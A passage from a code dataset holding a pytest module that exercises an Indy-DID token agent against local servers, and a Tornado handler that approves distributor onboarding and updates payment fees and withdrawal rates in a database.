StatsView(model=model)\r\n view.show()\r\n\r\n\r\n\r\n \r\n","sub_path":"data_analysis_with_python/run/Code/gsod_plot.py","file_name":"gsod_plot.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"197769266","text":"import sys, os\nmyPath = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, myPath + '/../PDS/')\n\nfrom indy import did,wallet,crypto\nfrom pds_agent import PDS_agent\nimport pytest\nimport requests\nimport json\nimport asyncio\nimport base64\nimport datetime\nimport time\n\n@pytest.yield_fixture(scope='module')\ndef event_loop(request):\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n@pytest.fixture(autouse=True, scope=\"module\")\nasync def server():\n import subprocess\n import time\n p1 = subprocess.Popen(['python3', 'PDS/pds.py'])\n p2 = subprocess.Popen(['python3', 'PDS/pds_admin.py'])\n 
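# A sturdier readiness check (a sketch; it assumes the admin service at\n    # http://localhost:9002/ responds once it is up) would poll instead of sleeping:\n    #\n    #     for _ in range(50):\n    #         try:\n    #             requests.get(\"http://localhost:9002/\")\n    #             break\n    #         except requests.exceptions.ConnectionError:\n    #             time.sleep(0.1)\n    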
time.sleep(5)  # Otherwise the server is not ready when tests start\n    '''\n    Add a DID to PDS server wallet\n    '''\n    user = {\n        'wallet_config': json.dumps({'id': 'user_wallet',\"storage_config\":{\"path\":\"tests/indy_wallets\"}}),\n        'wallet_credentials': json.dumps({'key': 'user_wallet_key'}),\n        'did': '4qk3Ab43ufPQVif4GAzLUW'\n    }\n    wallet_handle = await wallet.open_wallet(user['wallet_config'], user['wallet_credentials'])\n    verkey = await did.key_for_local_did(wallet_handle, user['did'])\n    nbf = time.mktime(datetime.datetime(2020, 6, 1, 00, 00).timetuple())\n    exp = time.mktime(datetime.datetime(2020, 6, 1, 23, 59).timetuple())\n    payload = {'action':'add','did':user['did'], 'verkey': verkey, 'metadata':json.dumps({'aud': 'locker1.sofie-iot.eu','nbf':nbf, 'exp': exp})}\n    response = requests.post(\"http://localhost:9002/\", data = payload).text\n    response = json.loads(response)\n    assert(response['code'] == 200)\n    await wallet.close_wallet(wallet_handle)\n    yield\n    p1.kill()\n    p2.kill()\n\n@pytest.mark.asyncio\nasync def test_valid_did():\n    user = {\n        'wallet_config': json.dumps({'id': 'user_wallet',\"storage_config\":{\"path\":\"tests/indy_wallets\"}}),\n        'wallet_credentials': json.dumps({'key': 'user_wallet_key'}),\n        'did': '4qk3Ab43ufPQVif4GAzLUW'\n    }\n    token = await PDS_agent.get_token_from_did(\"http://localhost:9001\", user['did'], \"locker1.sofie-iot.eu\", user['wallet_config'], user['wallet_credentials'])\n    print(token)\n    assert(token != \"\")","sub_path":"tests/test_pds_agent.py","file_name":"test_pds_agent.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"578390001","text":"# -*- coding: utf-8 -*-\n'''\nBEGIN\nAJAX request to approve or reject a distributor's onboarding (inlet) information\n    Required parameters:\n\n    Optional parameters:\n\n    Success:\n        {\"code\": 200, \"msg\": \"success\"}\n    Failure:\n        {\"code\": 406, \"msg\": \"fail\"}\nEND\n'''\nimport json\n\nfrom tornado import gen\nfrom tornado.httpclient import (\n    AsyncHTTPClient,\n)\nfrom tornado.web import authenticated, asynchronous\n\nfrom uline.handlers.baseHandlers import BkAdminHandler\nfrom uline.public import common\nfrom uline.public import log\nfrom uline.public.constants import AUTH_STATUS, translate_payment_type, old_payment_relations, new_payment_relations\nfrom uline.settings import FEATURE_SWITCH\nfrom uline.settings import (\n    WX_MCH_ID, WXPAY_KEY, APPID, WX_PUB_KEY, WX_PRIVATE_KEY, WX_ROOT_CA,\n    WX_APP_MCH_ID, WXPAY_APP_KEY, WX_APP_APPID, WX_APP_PUB_KEY,\n    WX_APP_PRIVATE_KEY, WX_APP_ROOT_CA,\n    WX_0_WX_MCH_ID, WX_0_WXPAY_KEY, WX_0_APPID, BANK_NAME\n)\nfrom uline.utils.record import record_utils\nfrom uline.utils.wxpay.merchantInletToWxV2 import UpdateMerchantInletToWx\nfrom uline.utils.wxpay.query_wx import create_wx_mch\nfrom uline.utils.wxpay.util import xml_to_dict\nfrom .form import AuthDistributorInfo\nfrom uline.public import constants\nfrom uline.model.uline.user import Employee\nfrom uline.model.uline.info import UserProfile\nfrom uline.model.uline.base import uline_session\nfrom uline.public.permit import check_permission\n\n\nclass AuthDistributorInletStatusHandler(BkAdminHandler):\n\n    @authenticated\n    @check_permission\n    def prepare(self):\n        form = AuthDistributorInfo(self)\n        if not form.validate():\n            f_rsp = common.f_rsp(code=406, msg='fail')\n            self.finish(f_rsp)\n        self.dt_id = form.dt_id.data\n        self.create_at = self.update_at = common.timestamp_now()\n\n        self.open_review = FEATURE_SWITCH['REVIEW']\n        if self.open_review:\n            self.bk_email = self.auth_user_email(self.session.get('bk_id'))\n\n        with 
self.db.get_db() as cur:\n ret = self.latest_status(cur)\n self.query_status, self.query_user = ret[0], ret[1]\n if self.query_status == 1:\n self.status = 4\n self.rsp = common.scc_rsp(code=200, msg='fsuccess')\n self.add_auth_inlet_info()\n self.auth_dt_inlet()\n self.finish(self.rsp)\n elif self.query_status == 4:\n self.status = 2\n self.rsp = common.scc_rsp(code=200, msg='csuccess')\n if self.query_user == self.bk_email:\n self.rsp = common.f_rsp(code=406, msg='fail')\n self.finish(self.rsp)\n else:\n self.rsp = common.f_rsp(code=406, msg='fail')\n self.finish(self.rsp)\n else:\n self.status = 2\n self.rsp = common.scc_rsp(code=200, msg='success')\n self.has_been_authed = self.has_authed()\n self.open_daily_cut = FEATURE_SWITCH.get('OPEN_DAILY_CUT', False) and self.has_been_authed\n\n @asynchronous\n @gen.coroutine\n def get(self):\n # print self.get_arguments()\n self.bk_email = yield self.get_bk_email()\n wx_reg_flag, wx_app_flag = True, True\n # wx_reg_pay = yield self.get_dt_wx_reg_payment()\n # wx_app_pay = yield self.get_dt_wx_app_payment()\n #\n # wx_id = yield self.get_dt_user_wx_id()\n # dt_inlet_info = yield self.get_dt_inlet_info()\n # 由于微信端渠道商进件有调整,不对其进行api进件,但保留原始信息\n wx_reg, wx_app = \"success\", \"success\"\n if not wx_reg_flag or not wx_app_flag:\n log.exception.info('进件到微信失败 wx_reg_flag:{}, wx_app_flag:{}'.format(\n wx_reg_flag, wx_app_flag))\n self.rsp = common.f_rsp(code=406, msg='进件到微信失败')\n\n comment_news = [wx_reg, wx_app]\n field = [\"微信支付进件:{}\", \"微信APP支付进件:{}\"]\n show_comment = \" \".join(_f.format(_com)\n for _f, _com in zip(field, comment_news) if _com != \"success\")\n\n yield self.add_fail_auth_inlet_info(show_comment)\n yield record_utils.rollback(self)\n\n self.status = 3\n yield self.auth_dt_inlet()\n else:\n yield self.update_dt_user()\n yield self.auth_dt_inlet()\n yield self.add_auth_inlet_info()\n self.invalid_past_record()\n yield self.update_changes()\n # if not self.has_been_authed:\n # self.activated_all_payment()\n\n self.update_dt_active_status()\n self.write(self.rsp)\n self.finish()\n\n @gen.coroutine\n def update_changes(self):\n cut_record = dict()\n # 检查这个商户是否有变更金额\n query_change_record_json = self.db.selectSQL(\n \"\"\"select data_json, id from change_record where status=1 and dt_id = %s;\"\"\",\n (self.dt_id,))\n employee = uline_session.query(Employee).filter(Employee.login_name == str(self.dt_id) + \".dt\").one()\n\n if self.status in [2, \"2\"]:\n uline_session.query(Employee).filter(Employee.id == employee.id).update({'status': 1})\n uline_session.query(UserProfile).filter(UserProfile.id == employee.user_id).update({'status': 1})\n uline_session.commit()\n # 验证数据的合法性\n if query_change_record_json:\n query_change_record = json.loads(query_change_record_json[0])\n if 'payment' in query_change_record:\n payments = query_change_record['payment']\n payment_cut_info = yield self.update_dt_payments(payments)\n if payment_cut_info:\n cut_record['payment'] = payment_cut_info\n\n if 'role' in query_change_record:\n role = query_change_record['role']\n if role:\n yield self.apply_d0_withdraw_fee(role)\n cut_record['withdraw'] = role\n # 账户信息修改\n if 'balance_info' in query_change_record:\n balance_update_info = query_change_record['balance_info']\n update_keys = ['balance_type', 'balance_name', 'bank_no', 'balance_account', 'id_card_no']\n change_balance_info = {key: balance_update_info[key] for key in update_keys if\n key in balance_update_info}\n change_balance_info['update_at'] = self.update_at\n 
self.update_balance_info(change_balance_info)\n\n need_update_keys = ['dt_name', 'province', 'city', 'address', 'contact', 'mobile', 'service_phone', 'email',\n 'id_card_img_f', 'id_card_img_b', 'dt_id', 'license_num', 'unionpay_id',\n 'license_start_date', 'license_end_date', 'license_period', 'license_scope',\n 'license_img', 'wx_channel_id', 'wx_app_channel_id', 'dt_type', 'u_ind_code',\n 'wx_ind_code', 'ali_ind_code', 'alipay_pid']\n change_inlet_info = {key: query_change_record[key] for key in need_update_keys if\n key in query_change_record}\n\n # 判断联系电话是否修改\n new_mobile = query_change_record.get('mobile')\n\n if new_mobile:\n # _password = common.bcrypt_pwd_new(str(self.get_dt_user_mobile()))\n result = yield self.auth_password(str(self.get_dt_user_mobile()))\n # 如果reesult为True,说明该渠道商还未登录,mobile已经被修改了\n if result:\n # 将密码修改为新的联系电话\n new_password = common.bcrypt_pwd_new(str(new_mobile))\n _query = \"\"\"update dt_user set password=%s where dt_id=%s;\"\"\"\n self.db.executeSQL(_query, (new_password, self.dt_id))\n uline_session.query(Employee).filter(Employee.login_name == str(self.dt_id) + \".dt\").update(\n {'login_passwd': new_password})\n\n if change_inlet_info:\n self.update_dt_user_email(change_inlet_info.get('email'))\n self.update_dt_inlet_info(change_inlet_info)\n change_record_status = constants.CHANGE_RECORD_STATUS_ACCEPT\n if cut_record and FEATURE_SWITCH.get('OPEN_DAILY_CUT'):\n change_record_status = constants.CHANGE_RECORD_STATUS_TO_CUT\n cut_record['change_record_id'] = query_change_record_json[1]\n cut_record['bk_id'] = self.current_user\n cut_record['bk_email'] = self.bk_email\n self.add_daily_cut_record(cut_record)\n query = \"\"\"update change_record set status = %s, create_at = now() where dt_id = %s and status=1;\"\"\"\n self.db.executeSQL(query, (change_record_status, self.dt_id,))\n\n _employee = {\"email\": \"email\", \"mobile\": \"phone1\", \"city\": \"city\", \"dt_name\": \"name\"}\n employee_update = {_employee[i]: change_inlet_info[i] for i in _employee.keys() if change_inlet_info.get(i)}\n if employee_update:\n uline_session.query(UserProfile).filter(UserProfile.id == employee.user_id).update(employee_update)\n uline_session.commit()\n\n def update_balance_info(self, change_balance_info):\n \"\"\"\n 更新结算账户信息\n :param cur: 数据库相关游标\n :param change_balance_info: dict,需要修改的信息\n \"\"\"\n sql = \"\"\"update dt_balance set \"\"\"\n update_colums = []\n params_values = []\n for key in change_balance_info:\n update_colums.append(\"\"\"{}=%s\"\"\".format(key))\n params_values.append(change_balance_info[key])\n sql = sql + ','.join(update_colums)\n where_str = \" where dt_id=%s;\"\n sql = sql + where_str\n params_values.append(self.dt_id)\n self.db.executeSQL(sql, tuple(params_values))\n\n def get_dt_user_mobile(self):\n ret = self.db.selectSQL(\n \"select mobile from dt_inlet_info where dt_id=%s\", (self.dt_id,))\n return ret[0]\n\n def update_dt_user_email(self, email):\n if email:\n sql = \"update dt_user set email = %s where dt_id = %s\"\n self.db.executeSQL(sql, (email, self.dt_id))\n\n @gen.coroutine\n def apply_d0_withdraw_fee(self, role):\n\n # {\"ali_draw_fee\": 9100, \"wx_draw_rate\": 190, \"wx_draw_fee\": 1900, \"ali_draw_rate\": 910},\n # {\"wx\": 10, '\"alipay\": 20}\n # 考虑老的wx和alipay\n # wx = role.get('wx')\n # alipay = role.get('alipay')\n # 手续费\n wx_draw_fee = role.get('wx') if role.get('wx') else role.get('wx_draw_fee')\n ali_draw_fee = role.get('alipay') if role.get('alipay') else role.get('ali_draw_fee')\n # 垫资费\n wx_draw_rate = 
role.get('wx_draw_rate')\n        ali_draw_rate = role.get('ali_draw_rate')\n\n        select_query = \"\"\"select wx, alipay from d0_withdraw_fee where role=%s and role_type='dt'\"\"\"\n        new_draw = \"\"\"select withdraw_rate, withdraw_fee from dt_payment where dt_id=%s and uline_payment_code like %s\"\"\"\n        sql_wx_draw = self.db.selectSQL(new_draw, (self.dt_id, 'WX%'), fetchone=True, use_dict=True)\n        sql_ali_draw = self.db.selectSQL(new_draw, (self.dt_id, 'ALI%'), fetchone=True, use_dict=True)\n\n        # select_mch = \"\"\"\n        #     select d0_withdraw_fee.wx, d0_withdraw_fee.alipay, mch_inlet_info.mch_id\n        #     from d0_withdraw_fee inner join mch_inlet_info on mch_inlet_info.mch_id = d0_withdraw_fee.role\n        #     where mch_inlet_info.dt_id = %s and d0_withdraw_fee.role_type='mch'\n        #     and (d0_withdraw_fee.wx < %s or d0_withdraw_fee.alipay < %s)\n        # \"\"\"\n\n        ret = self.db.selectSQL(select_query, (self.dt_id,), fetchone=True, use_dict=True)\n        # ret_mchs = self.db.selectSQL(select_mch, (self.dt_id, wx, alipay), fetchone=False)\n        withdraw_cut_info = {}\n        # ret is None when no fee record exists yet\n        if ret:\n            if sql_wx_draw and sql_wx_draw.get('withdraw_fee'):\n                ret['wx'] = sql_wx_draw.get('withdraw_fee')\n            if sql_ali_draw and sql_ali_draw.get('withdraw_fee'):\n                ret['alipay'] = sql_ali_draw.get('withdraw_fee')\n            # values that must be updated immediately\n            immediately_update_info = {}\n            # fields that go from absent to present\n            # or ret['wx'] is not None and wx is None:\n            if ret.get('wx') is None and wx_draw_fee is not None:\n                immediately_update_info['wx'] = wx_draw_fee\n            elif ret.get('wx') != wx_draw_fee:\n                withdraw_cut_info['wx'] = wx_draw_fee\n\n            # or ret['wx'] is not None and wx is None:\n            if ret.get('alipay') is None and ali_draw_fee is not None:\n                immediately_update_info['alipay'] = ali_draw_fee\n            elif ret.get('alipay') != ali_draw_fee:\n                withdraw_cut_info['alipay'] = ali_draw_fee\n\n            if sql_wx_draw and sql_wx_draw.get('withdraw_rate') is None and wx_draw_rate is not None:\n                immediately_update_info['wx_draw_rate'] = wx_draw_rate\n            elif sql_wx_draw and sql_wx_draw.get('withdraw_rate') != wx_draw_rate:\n                withdraw_cut_info['wx_draw_rate'] = wx_draw_rate\n\n            if sql_ali_draw and sql_ali_draw.get('withdraw_rate') is None and ali_draw_rate is not None:\n                immediately_update_info['ali_draw_rate'] = ali_draw_rate\n            elif sql_ali_draw and sql_ali_draw.get('withdraw_rate') != ali_draw_rate:\n                withdraw_cut_info['ali_draw_rate'] = ali_draw_rate\n\n            # if daily cut is not enabled, the change takes effect immediately\n            if not self.open_daily_cut:\n                query = \"\"\"update d0_withdraw_fee set wx=%s, alipay=%s where role=%s and role_type = %s\"\"\"\n                self.db.executeSQL(query, (wx_draw_fee, ali_draw_fee, self.dt_id, 'dt'))\n\n                # also persist into the dt_payment table (TODO: optimize later)\n                if wx_draw_fee:\n                    update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                    self.db.executeSQL(update_sql, (wx_draw_fee, self.dt_id, 'WX%'))\n                if ali_draw_fee:\n                    update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                    self.db.executeSQL(update_sql, (ali_draw_fee, self.dt_id, 'ALI%'))\n                if wx_draw_rate:\n                    update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                    self.db.executeSQL(update_sql, (wx_draw_rate, self.dt_id, 'WX%'))\n                if ali_draw_rate:\n                    update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                    self.db.executeSQL(update_sql, (ali_draw_rate, self.dt_id, 'ALI%'))\n\n                # check whether the withdrawal fee or advance rate now exceeds any subordinate merchant's\n                if sql_wx_draw and sql_wx_draw.get('withdraw_fee'):\n                    # the WeChat withdrawal fee was raised\n                    if wx_draw_fee and wx_draw_fee > 
sql_wx_draw.get('withdraw_fee'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (1,2,3,4,5);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (wx_draw_fee, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_fee=%s where mch_id in %s\n and payment_type in (1,2,3,4,5);\"\"\", (wx_draw_fee, tuple_mch_ids))\n\n if sql_wx_draw and sql_wx_draw.get('withdraw_rate'):\n # 调高微信手续费\n if wx_draw_rate and wx_draw_rate > sql_wx_draw.get('withdraw_rate'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (1,2,3,4,5);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (wx_draw_rate, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_rate=%s where mch_id in %s\n and payment_type in (1,2,3,4,5);\"\"\", (wx_draw_rate, tuple_mch_ids))\n\n if sql_ali_draw and sql_ali_draw.get('withdraw_fee'):\n # 调高微信手续费\n if ali_draw_fee and ali_draw_fee > sql_ali_draw.get('withdraw_fee'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (7,8,9);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (ali_draw_fee, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_fee=%s where mch_id in %s\n and payment_type in (7,8,9);\"\"\", (ali_draw_fee, tuple_mch_ids))\n\n if sql_ali_draw and sql_ali_draw.get('withdraw_rate'):\n # 调高微信手续费\n if ali_draw_rate and ali_draw_rate > sql_ali_draw.get('withdraw_rate'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (7,8,9);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (ali_draw_rate, self.dt_id), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set withdraw_rate=%s where mch_id in %s\n and payment_type in (7,8,9);\"\"\", (ali_draw_rate, tuple_mch_ids))\n\n # 如果打开了日切,并且有立即生效的数据,则更新改数据\n elif immediately_update_info and self.open_daily_cut:\n update_infos = []\n params = list()\n for key in immediately_update_info:\n if key in ['wx', 'alipay']:\n update_infos.append(\"{}=%s\".format(key))\n params.append(immediately_update_info[key])\n params.extend([self.dt_id, 'dt'])\n if update_infos:\n update_sql = \"\"\"update d0_withdraw_fee set {} where role=%s and role_type=%s\"\"\".format(\n ','.join(update_infos))\n self.db.executeSQL(update_sql, tuple(params))\n\n # 需要立即更新的数据保存到dt_paymnet表中\n if immediately_update_info.get('wx'):\n update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_fee, self.dt_id, 'WX%'))\n # 判断是否有商户低于渠道商成本\n if sql_wx_draw.get('withdraw_fee') and immediately_update_info.get('wx') > sql_wx_draw.get('withdraw_fee'):\n query = \"\"\"select mch_payment.mch_id from mch_payment\n where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n mch_payment.payment_type in (1,2,3,4,5);\"\"\"\n mch_ids = self.db.selectSQL(\n query, (wx_draw_fee, self.dt_id), 
fetchone=False)\n                    tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n                    if mch_ids:\n                        self.db.executeSQL(\"\"\"\n                        update mch_payment set withdraw_fee=%s where mch_id in %s\n                        and payment_type in (1,2,3,4,5);\"\"\", (wx_draw_fee, tuple_mch_ids))\n\n            if immediately_update_info.get('alipay'):\n                update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                self.db.executeSQL(update_sql, (ali_draw_fee, self.dt_id, 'ALI%'))\n\n                # check whether any merchant is now below the distributor's cost\n                if sql_ali_draw.get('withdraw_fee') and immediately_update_info.get('alipay') > sql_ali_draw.get('withdraw_fee'):\n                    query = \"\"\"select mch_payment.mch_id from mch_payment\n                    where mch_payment.withdraw_fee < %s and mch_payment.dt_id=%s and\n                    mch_payment.payment_type in (7,8,9);\"\"\"\n                    mch_ids = self.db.selectSQL(\n                        query, (ali_draw_fee, self.dt_id), fetchone=False)\n                    tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n                    if mch_ids:\n                        self.db.executeSQL(\"\"\"\n                        update mch_payment set withdraw_fee=%s where mch_id in %s\n                        and payment_type in (7,8,9);\"\"\", (immediately_update_info.get('alipay'), tuple_mch_ids))\n\n            if immediately_update_info.get('wx_draw_rate'):\n                update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                self.db.executeSQL(update_sql, (wx_draw_rate, self.dt_id, 'WX%'))\n\n                if sql_wx_draw.get('withdraw_rate') and immediately_update_info.get('wx_draw_rate') > sql_wx_draw.get('withdraw_rate'):\n                    query = \"\"\"select mch_payment.mch_id from mch_payment\n                    where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n                    mch_payment.payment_type in (7,8,9);\"\"\"\n                    mch_ids = self.db.selectSQL(\n                        query, (wx_draw_rate, self.dt_id), fetchone=False)\n                    tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n                    if mch_ids:\n                        self.db.executeSQL(\"\"\"\n                        update mch_payment set withdraw_rate=%s where mch_id in %s\n                        and payment_type in (7,8,9);\"\"\", (wx_draw_rate, tuple_mch_ids))\n\n            if immediately_update_info.get('ali_draw_rate'):\n                update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                self.db.executeSQL(update_sql, (ali_draw_rate, self.dt_id, 'ALI%'))\n\n                if sql_ali_draw.get('withdraw_rate') and immediately_update_info.get('ali_draw_rate') > sql_ali_draw.get('withdraw_rate'):\n                    query = \"\"\"select mch_payment.mch_id from mch_payment\n                    where mch_payment.withdraw_rate < %s and mch_payment.dt_id=%s and\n                    mch_payment.payment_type in (7,8,9);\"\"\"\n                    mch_ids = self.db.selectSQL(\n                        query, (ali_draw_rate, self.dt_id), fetchone=False)\n                    tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n                    if mch_ids:\n                        self.db.executeSQL(\"\"\"\n                        update mch_payment set withdraw_rate=%s where mch_id in %s\n                        and payment_type in (7,8,9);\"\"\", (ali_draw_rate, tuple_mch_ids))\n\n        else:\n            query = \"\"\"insert into d0_withdraw_fee(role, role_type, wx, alipay) values(%s,%s,%s,%s)\"\"\"\n            self.db.executeSQL(query, (self.dt_id, 'dt', wx_draw_fee, ali_draw_fee))\n\n            # also persist into the dt_payment table (TODO: optimize later)\n            if wx_draw_fee:\n                update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                self.db.executeSQL(update_sql, (wx_draw_fee, self.dt_id, 'WX%'))\n            if ali_draw_fee:\n                update_sql = \"\"\"update dt_payment set withdraw_fee=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n                self.db.executeSQL(update_sql, (ali_draw_fee, self.dt_id, 'ALI%'))\n            if wx_draw_rate:\n                update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like 
%s\"\"\"\n self.db.executeSQL(update_sql, (wx_draw_rate, self.dt_id, 'WX%'))\n if ali_draw_rate:\n update_sql = \"\"\"update dt_payment set withdraw_rate=%s where dt_id=%s and uline_payment_code like %s\"\"\"\n self.db.executeSQL(update_sql, (ali_draw_rate, self.dt_id, 'ALI%'))\n\n if not self.open_daily_cut:\n sql = \"\"\"update d0_withdraw_fee set {0}=%s where role_type='mch' and role in (\n select mch_inlet_info.mch_id\n from d0_withdraw_fee as df1 inner join mch_inlet_info on mch_inlet_info.mch_id = df1.role\n where mch_inlet_info.dt_id=%s and df1.role_type='mch'\n and df1.{0}<%s and df1.{0} NOTNULL\n )\"\"\"\n ali_sql = sql.format('alipay')\n self.db.executeSQL(ali_sql, (ali_draw_fee, self.dt_id, ali_draw_fee))\n wx_sql = sql.format('wx')\n self.db.executeSQL(wx_sql, (wx_draw_fee, self.dt_id, wx_draw_fee))\n\n @gen.coroutine\n def auth_password(self, password):\n valid = False\n selSql = \"select password from dt_user where dt_id=%s\"\n db_ret = self.db.selectSQL(selSql, (self.dt_id,))\n if db_ret:\n valid = yield common.bcrypt_pwd(password, db_ret[0])\n raise gen.Return(valid)\n\n def update_dt_inlet_info(self, change_inlet_info):\n sql = \"\"\"update dt_inlet_info set \"\"\"\n update_colums = []\n params_values = []\n for key in change_inlet_info:\n update_colums.append(\"\"\"{}=%s\"\"\".format(key))\n params_values.append(change_inlet_info[key])\n sql = sql + ','.join(update_colums)\n where_str = \" where dt_id=%s;\"\n sql = sql + where_str\n params_values.append(self.dt_id)\n self.db.executeSQL(sql, tuple(params_values))\n\n if 'dt_name' in change_inlet_info:\n sql = \"\"\"UPDATE dt_user SET dt_name=%s WHERE dt_id=%s;\"\"\"\n self.db.executeSQL(sql, (change_inlet_info['dt_name'], self.dt_id))\n\n def update_dt_active_status(self):\n sql = \"\"\"select count(*) as active_counts from dt_payment where activated_status=2 and dt_id=%s;\"\"\"\n result = self.db.selectSQL(sql, (self.dt_id,))\n activeed_counts = result[0]\n activated_status = 2 if activeed_counts >= 1 else 1\n sql = \"\"\"update dt_inlet_info set activated_status=%s where dt_id = %s;\"\"\"\n self.db.executeSQL(sql, (activated_status, self.dt_id))\n\n @gen.coroutine\n def update_dt_payments(self, payments):\n payment_cut_info = {}\n changed_payments = dict()\n if isinstance(payments, list):\n for each_payment in payments:\n changed_payments[each_payment[0]] = {'pay_type': each_payment[0],\n 'pay_rate': each_payment[1], 'pre_status': each_payment[2]}\n else:\n changed_payments = payments\n\n for pay_type in changed_payments:\n payment_info = changed_payments[pay_type]\n payment_type = payment_info['pay_type']\n payment_rate = payment_info['pay_rate']\n exist_status = payment_info['pre_status']\n action_type = payment_info.get('action_type', 2)\n\n # 将老的payment_type转换成uline_payment_code\n if payment_type.isdigit():\n # if isinstance(payment_type, int):\n uline_payment_code = old_payment_relations.get(payment_type)\n else:\n uline_payment_code = payment_type\n payment_type = new_payment_relations.get(uline_payment_code)\n\n # 如果是更新\n if action_type == 2:\n activated_status = 1\n dt_id = self.dt_id\n\n # 查询支付方式的原有费率,如果有且等于更新的费率,则需要还原为原有的激活状态\n sql = \"\"\"select activated_status, payment_rate from dt_payment where dt_id=%s and payment_type=%s;\"\"\"\n result = self.db.selectSQL(sql, (self.dt_id, payment_type))\n if result:\n exist_rate = result[1]\n # 如果与原有的费率一致,且原有状态为未激活或已激活,则保持原有状态\n if exist_rate and exist_rate == payment_rate and exist_status == 2:\n activated_status = exist_status\n to_daily_cut = False\n # 更新支付费率的信息\n\n 
if self.open_daily_cut:\n payment_cut_info[int(payment_type)] = {\n 'pre_payment_rate': exist_rate,\n 'pre_payment_status': exist_status,\n 'update_payment_rate': payment_rate,\n 'payment_type': int(payment_type),\n 'action_type': action_type\n }\n else:\n self.db.executeSQL(\"\"\"\n update dt_payment set payment_type=%s, payment_rate=%s, activated_status=%s, settle_rate=%s\n where dt_id=%s\n and payment_type=%s;\n \"\"\", (payment_type, payment_rate, activated_status, payment_rate, dt_id, payment_type))\n\n # 判断修改后的费率是否大于本来的费率\n if payment_rate > exist_rate:\n # 查询判断是否渠道商修改后的费率大于旗下商户\n query = \"\"\"select mch_payment.mch_id from mch_payment inner join mch_inlet_info on\n mch_inlet_info.mch_id = mch_payment.mch_id inner join dt_payment on\n mch_inlet_info.dt_id = dt_payment.dt_id and dt_payment.payment_type = mch_payment.payment_type\n where mch_payment.payment_rate < %s and dt_payment.dt_id=%s and\n dt_payment.payment_type=%s;\"\"\"\n mch_ids = self.db.selectSQL(\n query, (payment_rate, self.dt_id, payment_type), fetchone=False)\n tuple_mch_ids = tuple([mch_id[0] for mch_id in mch_ids])\n if mch_ids:\n self.db.executeSQL(\"\"\"\n update mch_payment set payment_rate=%s, settle_rate=%s where mch_id in %s\n and payment_type=%s;\"\"\", (payment_rate, payment_rate, tuple_mch_ids, payment_type))\n\n query = \"\"\"select dp_lower.dt_id from dt_payment as dp_lower inner join dt_inlet_info on\n dt_inlet_info.dt_id=dp_lower.dt_id inner join dt_payment dp_higher on\n dt_inlet_info.parent_id=dp_higher.dt_id and dp_lower.payment_type=dp_higher.payment_type\n where dp_lower.payment_rate<%s and dp_higher.dt_id=%s and dp_higher.payment_type=%s\"\"\"\n chain_ids = self.db.selectSQL(\n query, (payment_rate, self.dt_id, payment_type), fetchone=False)\n tuple_chain_ids = tuple([chain_id[0] for chain_id in chain_ids])\n if tuple_chain_ids:\n sql = \"\"\"update dt_payment set payment_rate=%s, settle_rate=%s where dt_id in %s and\n payment_type=%s;\"\"\"\n self.db.executeSQL(sql, (payment_rate, payment_rate,\n tuple_chain_ids, payment_type))\n # 新增支付方式\n elif action_type == 1:\n # 添加\n tmp_str = translate_payment_type.get(payment_type)\n uline_payment_id, uline_settle_id, trade_type,\\\n thirdparty_mch_id, uline_payment_code = tmp_str.split('|')\n\n sql = \"\"\"INSERT INTO dt_payment(dt_id, settle_rate, uline_payment_id, uline_payment_code,\n 